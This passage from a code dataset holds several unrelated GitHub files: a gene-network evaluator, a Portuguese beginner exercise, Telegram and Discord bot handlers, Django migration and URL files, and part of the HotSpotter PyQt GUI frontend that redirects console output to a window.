DREAM5Evaluator(Evaluator):\n \"\"\"Dream5 Network Evaluation\"\"\"\n def fit(self, labels, scores):\n labels = np.pad(labels, ((0, scores.shape[0] - labels.shape[0]), (0, scores.shape[1] - labels.shape[1])))\n super().fit(labels, scores)\n","repo_name":"msaremi/GENEREF","sub_path":"bionetwork/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19380260417","text":"# Programa: Lê dois valores e imprime qual é o maior.\n\na = int(input('Primeiro valor: '))\nb = int(input('Segundo valor: '))\nif a > b:\n print('O primeiro valor é maior!')\nif b > a:\n print('O segundo valor é maior!')\n\n#Na linha 3 (if a > b:) essa expressão será avaliada, se o seu resultado for verdadeiro, a linha 4 será executada. Se for falso, a linha 4 será ignorada. O mesmo acontece para a condição (if b > a:), se o seu resultado for verdadeiro a linha 6 será executada, se for falso será ignorada.\n","repo_name":"edmilsonlibanio/Ola-Mundo-Python","sub_path":"iapcompython/prog_4_1.py","file_name":"prog_4_1.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32722041671","text":"from telebot import types\n\nfrom buttons import back_button\nfrom deal_actions import actions_with_deals\nfrom deal_actions.actions_with_deals import check_open_deals, active_deal_sell_button_list\nfrom keyboards.keyboards import start_panel_markup\nfrom main import bot\n\n\n@bot.message_handler(func=lambda message: message.text == \"ACTIVE DEALS\")\ndef handle_active_trades(message):\n\tresponse = check_open_deals()\n\n\tsell_button_markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n\n\tif response[0]:\n\t\tactions_with_deals.currency_to_sell_1_module = response[0]\n\t\tactive_deal_sell_button_list.append(response[0])\n\t\tbutton = types.KeyboardButton(f'{response[0]}')\n\t\tsell_button_markup.add(button)\n\n\tif response[-1]:\n\t\tactions_with_deals.currency_to_sell_2_module = response[-1]\n\t\tactive_deal_sell_button_list.append(response[-1])\n\t\tbutton = types.KeyboardButton(f'{response[-1]}')\n\t\tsell_button_markup.add(button)\n\n\tif not active_deal_sell_button_list:\n\t\tbot.send_message(message.chat.id, 'NO ACTIVE DEALS', reply_markup=start_panel_markup)\n\telse:\n\t\tsell_button_markup.add(back_button)\n\t\tbot.send_message(message.chat.id, 'ACTIVE DEALS:', reply_markup=sell_button_markup)\n\n\n@bot.message_handler(func=lambda message: message.text == f\"{actions_with_deals.currency_to_sell_1_module}\")\ndef handle_sell_first(message):\n\tsymbol = actions_with_deals.currency_to_sell_1_module\n\tresponse = f'CHOOSE ACTION FOR {symbol}'\n\tchoose_action_markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n\tsell_now_button = types.KeyboardButton(f'SELL {symbol} NOW')\n\tlimit_button = types.KeyboardButton(f'LIMIT ORDER {symbol}')\n\tchoose_action_markup.add(sell_now_button, limit_button, back_button)\n\tbot.send_message(message.chat.id, response, reply_markup=choose_action_markup)\n","repo_name":"wickedwicked26/telegram-control-bot","sub_path":"deal_actions/handlers/deal_action_handlers.py","file_name":"deal_action_handlers.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23268120105","text":"import discord\nimport os\nimport imgurpython\nimport requests\nfrom discord.ext import commands\nimport random\nimport praw\nfrom textblob import TextBlob\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv('../.env'))\nCLIENT_ID = os.environ['REDDIT_CLIENT_ID']\nCLIENT_SECRET = os.environ['REDDIT_CLIENT_SECRET']\nUSER_AGENT = os.environ['REDDIT_USER_AGENT']\nIMGUR_ID = os.environ['IMGUR_CLIENT_ID']\nIMGUR_SECRET = os.environ['IMGUR_CLIENT_SECRET']\n\nclass Fun(commands.Cog):\n \"\"\"Stuff that's fun\"\"\"\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=['8ball'])\n async def _8ball(self, ctx, *, question):\n \"\"\"Magic 8ball\"\"\"\n responses = [\"It is certain.\",\n \"It is decidedly so.\",\n \"Without a doubt.\",\n \"Yes - definitely.\",\n \"You may rely on it.\",\n \"As I see it, yes.\",\n \"Most likely.\",\n \"Outlook good.\",\n \"Yes.\",\n \"Signs point to yes.\",\n \"Reply hazy, try again.\",\n \"Ask again later.\",\n \"Better not tell you now.\",\n \"Cannot predict now.\",\n \"Concentrate and ask again.\",\n \"Don't count on it.\",\n \"My reply is no.\",\n \"My sources say no.\",\n \"Outlook not so good.\",\n \"Very doubtful.\"]\n res = discord.Embed(title=f'Question : **{question}**',description=f'Answer: **{random.choice(responses)}**')\n await ctx.send(embed=res)\n\n @commands.command()\n async def meme(self, ctx):\n \"\"\"Gets memes from Reddit\"\"\"\n reddit = praw.Reddit(client_id=REDDIT_CLIENT_ID, client_secret=REDDIT_CLIENT_SECRET,\n user_agent=REDDIT_USER_AGENT, check_for_async=False)\n post = reddit.subreddit(\n 'memes+dankmemes+me_irl+MadeMeSmile+cursedcomments').hot(limit=20)\n post = [i for i in post]\n post = random.choice(post)\n res = discord.Embed(\n title=f'**{post.title}**', url=f'https://reddit.com{post.permalink}', colour=discord.Colour(0x000000))\n res.set_footer(text=f'{post.score} 👍')\n res.set_image(url=post.url)\n await ctx.send(embed=res)\n\n @commands.command()\n async def joke(self, ctx):\n \"\"\"Returns a joke from r/Jokes and r/darkjokes\"\"\"\n reddit = praw.Reddit(client_id=REDDIT_CLIENT_ID, client_secret=REDDIT_CLIENT_SECRET,\n user_agent=REDDIT_USER_AGENT, check_for_async=False)\n\n post = reddit.subreddit('Jokes+darkjokes').hot(limit=30)\n post = [i for i in post]\n post = random.choice(post)\n\n res = discord.Embed(\n title=f'**{post.title}**', url=f'https://reddit.com{post.permalink}', description=post.selftext, colour=discord.Colour(0x000000))\n await ctx.send(embed=res)\n\n @commands.command(aliases=[\"senti\"])\n async def sentiment(self, ctx, *, sentence):\n \"\"\"Returns sentiment of a sentence\"\"\"\n if sentence:\n words = TextBlob(sentence)\n res = discord.Embed(title=f'{sentence}', description= f'Calculated sentiment {words.sentiment.polarity}')\n res.set_footer(text=\"If value>0 then positive, <0 then negative and =0 then neutral sentiment\")\n await ctx.send(embed=res)\n @commands.command()\n async def imgur(self, ctx, *, query):\n \"\"\"Returns an image from imgur\"\"\"\n if query:\n client = imgurpython.ImgurClient(IMGUR_ID,IMGUR_SECRET)\n items = client.gallery_search(query)[:]\n post = random.choice(items)\n res = discord.Embed(title=post.title)\n res.set_image(url=post.link)\n await ctx.send(post.link)\n\ndef setup(client):\n client.add_cog(Fun(client))\n","repo_name":"sidhant-sriv/Discord-Bot","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31786959938","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport multiple.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cliente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Nombre', models.CharField(max_length=50, verbose_name=b'Nombre')),\n ('Foto', multiple.utils.NMImageField(upload_to=multiple.utils.content_file_name)),\n ],\n options={\n 'verbose_name': 'Cliente',\n 'verbose_name_plural': 'Clientes',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"MikeVelazcoMtz/multiple","sub_path":"multiple/apps/usuarios/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5980549921","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"listings/\", views.listing, name=\"listing\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"add/\", views.addToWatchlist, name=\"addToWatchlist\"),\n path(\"remove/\", views.removeWatchlist, name=\"removeWatchlist\"),\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"category/\", views.category, name=\"category\"),\n path(\"close/\", views.closeListing, name=\"close\"),\n path(\"closedListing/\", views.closedListing, name=\"closedListing\"),\n path(\"comment/\", views.addComent, name=\"comment\"),\n]\n","repo_name":"MoazHassan2022/commerce","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25831676541","text":"\nfrom hscom import __common__\n(print, print_, print_on, print_off,\n rrr, profile, printDBG) = __common__.init(__name__, '[front]', DEBUG=False)\n# Python\nimport sys\n# Qt\nif 0:\n from PyQt4 import QtGui, QtCore\n from PyQt4.Qt import (QAbstractItemView, pyqtSignal, Qt)\n from PyQt5.QtGui import QMainWindow\n from PyQt5.QtGui import QTableWidgetItem\n QtWidgets = QtGui\nelse:\n from matplotlib.backends import backend_qt5 as backend_qt\n from PyQt5 import QtCore\n from PyQt5 import QtGui\n from PyQt5.QtCore import *\n from PyQt5.QtGui import *\n from PyQt5.QtWidgets import *\n from PyQt5.QtWidgets import QMainWindow\n from PyQt5.QtWidgets import QTableWidgetItem\n from PyQt5 import QtWidgets\n QtWidgets.QApplication.UnicodeUTF8 = -1\n\n# HotSpotter\nfrom ._frontend.MainSkel import Ui_mainSkel\nfrom . import guitools\nfrom .guitools import slot_\nfrom .guitools import frontblocking as blocking\nfrom hscom import tools\n\n#=================\n# Globals\n#=================\n\nIS_INIT = False\nNOSTEAL_OVERRIDE = False # Hard disable switch for stream stealer\n\n\n#=================\n# Decorators / Helpers\n#=================\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n _fromUtf8 = lambda s: s\n\ndef clicked(func):\n def clicked_wrapper(front, item, *args, **kwargs):\n if front.isItemEditable(item):\n front.print('[front] does not select when clicking editable column')\n return\n if item == front.prev_tbl_item:\n return\n front.prev_tbl_item = item\n return func(front, item, *args, **kwargs)\n clicked_wrapper.__name__ = func.__name__\n # Hacky decorator\n return clicked_wrapper\n\n\ndef csv_sanatize(str_):\n return str(str_).replace(',', ';;')\n\n\n#=================\n# Stream Stealer\n#=================\nimport logging\n\n\nclass GUILoggingSender(QtCore.QObject):\n write_ = QtCore.pyqtSignal(str)\n\n def __init__(self, front):\n super(GUILoggingSender, self).__init__()\n self.write_.connect(front.gui_write)\n\n def write_gui(self, msg):\n self.write_.emit(str(msg))\n\n\nclass GUILoggingHandler(logging.StreamHandler):\n \"\"\"\n A handler class which sends messages to to a connected QSlot\n \"\"\"\n def __init__(self, front):\n super(GUILoggingHandler, self).__init__()\n self.sender = GUILoggingSender(front)\n\n def emit(self, record):\n try:\n msg = self.format(record) + '\\n'\n self.sender.write_.emit(msg)\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n\nclass StreamStealer(QtCore.QObject):\n write_ = QtCore.pyqtSignal(str)\n flush_ = QtCore.pyqtSignal()\n\n def __init__(self, front, parent=None, share=False):\n super(StreamStealer, self).__init__(parent)\n # Define the Stream Stealer write function\n if share:\n self.write = self.write_shared\n else:\n self.write = self.write_gui\n self.write_.connect(front.gui_write)\n self.flush_.connect(front.gui_flush)\n # Do the stealing\n #stream_holder = sys\n #try:\n #__IPYTHON__\n #print('[front] detected __IPYTHON__')\n #from IPython.utils import io as iio\n #stream_holder = iio.IOTerm(None, self)\n #return\n #except NameError:\n #print('[front] did not detect __IPYTHON__')\n #pass\n #except Exception as ex:\n #print(ex)\n #raise\n\n # Remember which stream you've stolen\n self.iostream = sys.stdout\n self.iostream2 = sys.stderr\n # Redirect standard out to the StreamStealer object\n sys.stderr = self\n sys.stdout = self\n #steam_holder.stdout\n\n def write_shared(self, msg):\n msg_ = str(str(msg))\n self.iostream.write(msg_)\n self.write_.emit(msg_)\n\n def write_gui(self, msg):\n self.write_.emit(str(msg))\n\n def flush(self):\n self.flush_.emit()\n\n\ndef _steal_stdout(front):\n from hscom import params\n #front.ui.outputEdit.setPlainText(sys.stdout)\n nosteal = params.args.nosteal\n noshare = params.args.noshare\n if '--cmd' in sys.argv:\n nosteal = noshare = True\n #from IPython.utils import io\n #with io.capture_output() as captured:\n #%run my_script.py\n if NOSTEAL_OVERRIDE or (nosteal and noshare):\n print('[front] not stealing stdout.')\n return\n print('[front] stealing standard out')\n if front.ostream is None:\n # Connect a StreamStealer object to the GUI output window\n if '--nologging' in sys.argv:\n front.ostream = StreamStealer(front, share=not noshare)\n else:\n front.gui_logging_handler = GUILoggingHandler(front)\n __common__.add_logging_handler(front.gui_logging_handler)\n else:\n print('[front] stream already stolen')\n\n\ndef _return_stdout(front):\n #front.ui.outputEdit.setPlainText(sys.stdout)\n print('[front] returning standard out')\n if front.ostream is not None:\n sys.stdout = front.ostream.iostream\n sys.stderr = front.ostream.iostream2\n front.ostream = None\n return True\n else:\n print('[front] stream has not been stolen')\n return False\n\n\n#=================\n# Initialization\n#=================\n\n\ndef init_ui(front):\n ui = Ui_mainSkel()\n ui.setupUi(front)\n return ui\n\n\ndef connect_file_signals(front):\n ui = front.ui\n back = front.back\n ui.actionNew_Database.triggered.connect(back.new_database)\n ui.actionOpen_Database.triggered.connect(back.open_database)\n ui.actionSave_Database.triggered.connect(back.save_database)\n ui.actionImport_Img_file.triggered.connect(back.import_images_from_file)\n ui.actionImport_Img_dir.triggered.connect(back.import_images_from_dir)\n ui.actionQuit.triggered.connect(back.quit)\n\n\ndef connect_action_signals(front):\n ui = front.ui\n back = front.back\n ui.actionAdd_Chip.triggered.connect(back.add_chip)\n ui.actionNew_Chip_Property.triggered.connect(back.new_prop)\n ui.actionQuery.triggered.connect(back.query)\n ui.actionReselect_Ori.triggered.connect(back.reselect_ori)\n ui.actionReselect_ROI.triggered.connect(back.reselect_roi)\n ui.actionDelete_Chip.triggered.connect(back.delete_chip)\n ui.actionDelete_Image.triggered.connect(back.delete_image)\n ui.actionNext.triggered.connect(back.select_next)\n\n\ndef connect_option_signals(front):\n ui = front.ui\n back = front.back\n ui.actionLayout_Figures.triggered.connect(back.layout_figures)\n ui.actionPreferences.triggered.connect(back.edit_preferences)\n #ui.actionTogPts.triggered.connect(back.toggle_points)\n\n\ndef connect_help_signals(front):\n ui = front.ui\n back = front.back\n msg_event = lambda title, msg: lambda: guitools.msgbox(title, msg)\n ui.actionView_Docs.triggered.connect(back.view_docs)\n ui.actionView_DBDir.triggered.connect(back.view_database_dir)\n ui.actionView_Computed_Dir.triggered.connect(back.view_computed_dir)\n ui.actionView_Global_Dir.triggered.connect(back.view_global_dir)\n\n ui.actionAbout.triggered.connect(msg_event('About', 'hotspotter'))\n ui.actionDelete_computed_directory.triggered.connect(back.delete_cache)\n ui.actionDelete_global_preferences.triggered.connect(back.delete_global_prefs)\n ui.actionDelete_Precomputed_Results.triggered.connect(back.delete_queryresults_dir)\n ui.actionDev_Mode_IPython.triggered.connect(back.dev_mode)\n ui.actionDeveloper_Reload.triggered.connect(back.dev_reload)\n #Taken care of by add_action ui.actionDetect_Duplicate_Images.triggered.connect(back.detect_dupimg)\n #ui.actionWriteLogs.triggered.connect(back.write_logs)\n\n\ndef connect_batch_signals(front):\n ui = front.ui\n back = front.back\n #ui.actionBatch_Change_Name.triggered.connect(back.batch_rename)\n ui.actionPrecomputeChipsFeatures.triggered.connect(back.precompute_feats)\n ui.actionPrecompute_Queries.triggered.connect(back.precompute_queries)\n #ui.actionScale_all_ROIS.triggered.connect(back.expand_rois)\n #ui.actionConvert_all_images_into_chips.triggered.connect(back.convert_images2chips)\n #ui.actionAddMetaProp.triggered.connect(back.add_chip_property)\n #ui.actionAutoassign.triggered.connect(back.autoassign)\n\n\ndef connect_experimental_signals(front):\n ui = front.ui\n back = front.back\n ui.actionMatching_Experiment.triggered.connect(back.actionRankErrorExpt)\n ui.actionName_Consistency_Experiment.triggered.connect(back.autoassign)\n\n\n#def popup(front, pos):\n #for i in front.ui.gxs_TBL.selectionModel().selection().indexes():\n #front.print(repr((i.row(), i.column())))\n #menu = QtWidgets.QMenu()\n #action1 = menu.addAction(\"action1\")\n #action2 = menu.addAction(\"action2\")\n #action3 = menu.addAction(\"action2\")\n #action = menu.exec_(front.ui.gxs_TBL.mapToGlobal(pos))\n #front.print('action = %r ' % action)\n\ndef new_menu_action(front, menu_name, name, text=None, shortcut=None, slot_fn=None):\n # Dynamically add new menu actions programatically\n action_name = name\n action_text = text\n action_shortcut = shortcut\n ui = front.ui\n if hasattr(ui, action_name):\n raise Exception('menu action already defined')\n action = QtWidgets.QAction(front)\n setattr(ui, action_name, action)\n action.setShortcutContext(QtCore.Qt.ApplicationShortcut)\n action.setObjectName(_fromUtf8(action_name))\n menu = getattr(ui, menu_name)\n menu.addAction(action)\n if action_text is None:\n action_text = action_name\n # TODO: Have ui.retranslate call this\n def retranslate_fn():\n printDBG('retranslating %s' % name)\n action.setText(QtWidgets.QApplication.translate(\"mainSkel\", action_text, None, QtWidgets.QApplication.UnicodeUTF8))\n if action_shortcut is not None:\n action.setShortcut(QtWidgets.QApplication.translate(\"mainSkel\", action_shortcut, None, QtWidgets.QApplication.UnicodeUTF8))\n def connect_fn():\n printDBG('connecting %s' % name)\n action.triggered.connect(slot_fn)\n connect_fn.__name__ = name + '_' + connect_fn.__name__\n retranslate_fn.__name__ = name + '_' + retranslate_fn.__name__\n front.connect_fns.append(connect_fn)\n front.retranslatable_fns.append(retranslate_fn)\n retranslate_fn()\n\n\ndef set_tabwidget_text(front, tblname, text):\n printDBG('[front] set_tabwidget_text(%s, %s)' % (tblname, text))\n tablename2_tabwidget = {\n 'gxs': front.ui.image_view,\n 'cxs': front.ui.chip_view,\n 'nxs': front.ui.name_view,\n 'res': front.ui.result_view,\n }\n ui = front.ui\n tab_widget = tablename2_tabwidget[tblname]\n tab_index = ui.tablesTabWidget.indexOf(tab_widget)\n tab_text = QtWidgets.QApplication.translate(\"mainSkel\", text, None,\n QtWidgets.QApplication.UnicodeUTF8)\n ui.tablesTabWidget.setTabText(tab_index, tab_text)\n\n\nclass MainWindowFrontend(QMainWindow):\n printSignal = pyqtSignal(str)\n quitSignal = pyqtSignal()\n selectGxSignal = pyqtSignal(int)\n selectCidSignal = pyqtSignal(int)\n selectResSignal = pyqtSignal(int)\n selectNameSignal = pyqtSignal(str)\n changeCidSignal = pyqtSignal(int, str, str)\n aliasNameSignal = pyqtSignal(int, str, str)\n changeGxSignal = pyqtSignal(int, str, bool)\n querySignal = pyqtSignal()\n\n def __init__(front, back):\n super(MainWindowFrontend, front).__init__()\n #print('[*front] creating frontend')\n front.prev_tbl_item = None\n front.ostream = None\n front.gui_logging_handler = None\n front.back = back\n front.ui = init_ui(front)\n # Programatially Defined Actions\n front.retranslatable_fns = []\n front.connect_fns = []\n new_menu_action(front, 'menuHelp', 'actionDetect_Duplicate_Images',\n text='Detect Duplicate Images', slot_fn=back.detect_dupimg)\n # Progress bar is not hooked up yet\n front.ui.progressBar.setVisible(False)\n front.connect_signals()\n front.steal_stdout()\n\n def steal_stdout(front):\n return _steal_stdout(front)\n\n def return_stdout(front):\n return _return_stdout(front)\n\n # TODO: this code is duplicated in back\n def user_info(front, *args, **kwargs):\n return guitools.user_info(front, *args, **kwargs)\n\n def user_input(front, *args, **kwargs):\n return guitools.user_input(front, *args, **kwargs)\n\n def user_option(front, *args, **kwargs):\n return guitools.user_option(front, *args, **kwargs)\n\n @slot_()\n def closeEvent(front, event):\n #front.printSignal.emit('[*front] closeEvent')\n event.accept()\n front.quitSignal.emit()\n\n def connect_signals(front):\n # Connect signals to slots\n back = front.back\n ui = front.ui\n # Frontend Signals\n front.printSignal.connect(back.backend_print)\n front.quitSignal.connect(back.quit)\n front.selectGxSignal.connect(back.select_gx)\n front.selectCidSignal.connect(back.select_cid)\n front.selectResSignal.connect(back.select_res_cid)\n front.selectNameSignal.connect(back.select_name)\n front.changeCidSignal.connect(back.change_chip_property)\n front.aliasNameSignal.connect(back.alias_name)\n front.changeGxSignal.connect(back.change_image_property)\n front.querySignal.connect(back.query)\n\n # Menubar signals\n connect_file_signals(front)\n connect_action_signals(front)\n connect_option_signals(front)\n connect_batch_signals(front)\n #connect_experimental_signals(front)\n connect_help_signals(front)\n for func in front.connect_fns:\n func()\n #\n # Gui Components\n # Tables Widgets\n ui.cxs_TBL.itemClicked.connect(front.chip_tbl_clicked)\n ui.cxs_TBL.itemChanged.connect(front.chip_tbl_changed)\n ui.gxs_TBL.itemClicked.connect(front.img_tbl_clicked)\n ui.gxs_TBL.itemChanged.connect(front.img_tbl_changed)\n ui.res_TBL.itemClicked.connect(front.res_tbl_clicked)\n ui.res_TBL.itemChanged.connect(front.res_tbl_changed)\n ui.nxs_TBL.itemClicked.connect(front.name_tbl_clicked)\n ui.nxs_TBL.itemChanged.connect(front.name_tbl_changed)\n # Tab Widget\n ui.tablesTabWidget.currentChanged.connect(front.change_view)\n ui.cxs_TBL.sortByColumn(0, Qt.AscendingOrder)\n ui.res_TBL.sortByColumn(0, Qt.AscendingOrder)\n ui.gxs_TBL.sortByColumn(0, Qt.AscendingOrder)\n\n def print(front, msg):\n print('[*front*] ' + msg)\n #front.printSignal.emit('[*front] ' + msg)\n\n @slot_(bool)\n def setEnabled(front, flag):\n #front.printDBG('setEnabled(%r)' % flag)\n ui = front.ui\n # Enable or disable all actions\n for uikey in list(ui.__dict__.keys()):\n if uikey.find('action') == 0:\n ui.__dict__[uikey].setEnabled(flag)\n\n # The following options are always enabled\n ui.actionOpen_Database.setEnabled(True)\n ui.actionNew_Database.setEnabled(True)\n ui.actionQuit.setEnabled(True)\n ui.actionAbout.setEnabled(True)\n ui.actionView_Docs.setEnabled(True)\n ui.actionDelete_global_preferences.setEnabled(True)\n\n # The following options are no implemented. Disable them\n ui.actionConvert_all_images_into_chips.setEnabled(False)\n ui.actionBatch_Change_Name.setEnabled(False)\n ui.actionScale_all_ROIS.setEnabled(False)\n ui.actionWriteLogs.setEnabled(False)\n ui.actionAbout.setEnabled(False)\n #ui.actionView_Docs.setEnabled(False)\n\n @slot_(str, list, list, list, list)\n @blocking\n def populate_tbl(front, tblname, col_fancyheaders, col_editable,\n row_list, datatup_list):\n #front.printDBG('populate_tbl(%s)' % table_name)\n tblname = str(tblname)\n fancytab_dict = {\n 'gxs': 'Image Table',\n 'cxs': 'Chip Table',\n 'nxs': 'Name Table',\n 'res': 'Query Results Table',\n }\n tbl_dict = {\n 'gxs': front.ui.gxs_TBL,\n 'cxs': front.ui.cxs_TBL,\n 'nxs': front.ui.nxs_TBL,\n 'res': front.ui.res_TBL,\n }\n tbl = tbl_dict[tblname]\n #try:\n #tbl = front.ui.__dict__['%s_TBL' % tblname]\n #except KeyError:\n #ui_keys = front.ui.__dict__.keys()\n #tblname_list = [key for key in ui_keys if key.find('_TBL') >= 0]\n #msg = '\\n'.join(['Invalid tblname = %s_TBL' % tblname,\n #'valid names:\\n ' + '\\n '.join(tblname_list)])\n #raise Exception(msg)\n front._populate_table(tbl, col_fancyheaders, col_editable, row_list, datatup_list)\n # Set the tab text to show the number of items listed\n text = fancytab_dict[tblname] + ' : %d' % len(row_list)\n set_tabwidget_text(front, tblname, text)\n\n def _populate_table(front, tbl, col_fancyheaders, col_editable, row_list, datatup_list):\n # TODO: for chip table: delete metedata column\n # RCOS TODO:\n # I have a small right-click context menu working\n # Maybe one of you can put some useful functions in these?\n # RCOS TODO: How do we get the clicked item on a right click?\n # RCOS TODO:\n # The data tables should not use the item model\n # Instead they should use the more efficient and powerful\n # QAbstractItemModel / QAbstractTreeModel\n def set_header_context_menu(hheader):\n hheader.setContextMenuPolicy(Qt.CustomContextMenu)\n opt2_callback = [\n ('header', lambda: print('finishme')),\n ('cancel', lambda: print('cancel')), ]\n popup_slot = guitools.popup_menu(tbl, opt2_callback)\n hheader.customContextMenuRequested.connect(popup_slot)\n\n def set_table_context_menu(tbl):\n tbl.setContextMenuPolicy(Qt.CustomContextMenu)\n opt2_callback = [\n ('Query', front.querySignal.emit), ]\n popup_slot = guitools.popup_menu(tbl, opt2_callback)\n tbl.customContextMenuRequested.connect(popup_slot)\n\n hheader = tbl.horizontalHeader()\n #set_header_context_menu(hheader)\n #set_table_context_menu(tbl)\n\n sort_col = hheader.sortIndicatorSection()\n sort_ord = hheader.sortIndicatorOrder()\n tbl.sortByColumn(0, Qt.AscendingOrder) # Basic Sorting\n tblWasBlocked = tbl.blockSignals(True)\n tbl.clear()\n tbl.setColumnCount(len(col_fancyheaders))\n tbl.setRowCount(len(row_list))\n tbl.verticalHeader().hide()\n tbl.setHorizontalHeaderLabels(col_fancyheaders)\n tbl.setSelectionMode(QAbstractItemView.SingleSelection)\n tbl.setSelectionBehavior(QAbstractItemView.SelectRows)\n tbl.setSortingEnabled(False)\n #dbg_col2_dtype = {}\n #def DEBUG_COL_DTYPE(col, dtype):\n #if not dtype in dbg_col2_dtype:\n #dbg_col2_dtype[dtype] = [col]\n #else:\n #if not col in dbg_col2_dtype[dtype]:\n #dbg_col2_dtype[dtype].append(col)\n # Add items for each row and column\n for row in iter(row_list):\n data_tup = datatup_list[row]\n for col, data in enumerate(data_tup):\n item = QTableWidgetItem()\n # RCOS TODO: Pass in datatype here.\n # BOOLEAN DATA\n if tools.is_bool(data) or data == 'True' or data == 'False':\n check_state = Qt.Checked if bool(data) else Qt.Unchecked\n item.setCheckState(check_state)\n #DEBUG_COL_DTYPE(col, 'bool')\n #item.setData(Qt.DisplayRole, bool(data))\n # INTEGER DATA\n elif tools.is_int(data):\n item.setData(Qt.DisplayRole, int(data))\n #DEBUG_COL_DTYPE(col, 'int')\n # FLOAT DATA\n elif tools.is_float(data):\n item.setData(Qt.DisplayRole, float(data))\n #DEBUG_COL_DTYPE(col, 'float')\n # STRING DATA\n else:\n item.setText(str(data))\n #DEBUG_COL_DTYPE(col, 'string')\n # Mark as editable or not\n if col_editable[col]:\n item.setFlags(item.flags() | Qt.ItemIsEditable)\n item.setBackground(QtWidgets.QColor(250, 240, 240))\n else:\n item.setFlags(item.flags() ^ Qt.ItemIsEditable)\n item.setTextAlignment(Qt.AlignHCenter)\n tbl.setItem(row, col, item)\n\n #print(dbg_col2_dtype)\n tbl.setSortingEnabled(True)\n tbl.sortByColumn(sort_col, sort_ord) # Move back to old sorting\n tbl.show()\n tbl.blockSignals(tblWasBlocked)\n\n def isItemEditable(self, item):\n return int(Qt.ItemIsEditable & item.flags()) == int(Qt.ItemIsEditable)\n\n #=======================\n # General Table Getters\n #=======================\n\n def get_tbl_header(front, tbl, col):\n # Map the fancy header back to the internal one.\n fancy_header = str(tbl.horizontalHeaderItem(col).text())\n header = (front.back.reverse_fancy[fancy_header]\n if fancy_header in front.back.reverse_fancy else fancy_header)\n return header\n\n def get_tbl_int(front, tbl, row, col):\n return int(tbl.item(row, col).text())\n\n def get_tbl_str(front, tbl, row, col):\n return str(tbl.item(row, col).text())\n\n def get_header_val(front, tbl, header, row):\n # RCOS TODO: This is hacky. These just need to be\n # in dicts to begin with.\n tblname = str(tbl.objectName()).replace('_TBL', '')\n tblname = tblname.replace('image', 'img') # Sooooo hack\n # TODO: backmap from fancy headers to consise\n col = front.back.table_headers[tblname].index(header)\n return tbl.item(row, col).text()\n\n #=======================\n # Specific Item Getters\n #=======================\n\n def get_chiptbl_header(front, col):\n return front.get_tbl_header(front.ui.cxs_TBL, col)\n\n def get_imgtbl_header(front, col):\n return front.get_tbl_header(front.ui.gxs_TBL, col)\n\n def get_restbl_header(front, col):\n return front.get_tbl_header(front.ui.res_TBL, col)\n\n def get_nametbl_header(front, col):\n return front.get_tbl_header(front.ui.nxs_TBL, col)\n\n def get_restbl_cid(front, row):\n return int(front.get_header_val(front.ui.res_TBL, 'cid', row))\n\n def get_chiptbl_cid(front, row):\n return int(front.get_header_val(front.ui.cxs_TBL, 'cid', row))\n\n def get_nametbl_name(front, row):\n return str(front.get_header_val(front.ui.nxs_TBL, 'name', row))\n\n def get_nametbl_nx(front, row):\n return int(front.get_header_val(front.ui.nxs_TBL, 'nx', row))\n\n def get_imgtbl_gx(front, row):\n return int(front.get_header_val(front.ui.gxs_TBL, 'gx', row))\n\n #=======================\n # Table Changed Functions\n #=======================\n\n @slot_(QTableWidgetItem)\n def img_tbl_changed(front, item):\n front.print('img_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_gx = front.get_imgtbl_gx(row)\n header_lbl = front.get_imgtbl_header(col)\n new_val = item.checkState() == Qt.Checked\n front.changeGxSignal.emit(sel_gx, header_lbl, new_val)\n\n @slot_(QTableWidgetItem)\n def chip_tbl_changed(front, item):\n front.print('chip_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_cid = front.get_chiptbl_cid(row) # Get selected chipid\n new_val = csv_sanatize(item.text()) # sanatize for csv\n header_lbl = front.get_chiptbl_header(col) # Get changed column\n front.changeCidSignal.emit(sel_cid, header_lbl, new_val)\n\n @slot_(QTableWidgetItem)\n def res_tbl_changed(front, item):\n front.print('res_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_cid = front.get_restbl_cid(row) # The changed row's chip id\n new_val = csv_sanatize(item.text()) # sanatize val for csv\n header_lbl = front.get_restbl_header(col) # Get changed column\n front.changeCidSignal.emit(sel_cid, header_lbl, new_val)\n\n @slot_(QTableWidgetItem)\n def name_tbl_changed(front, item):\n 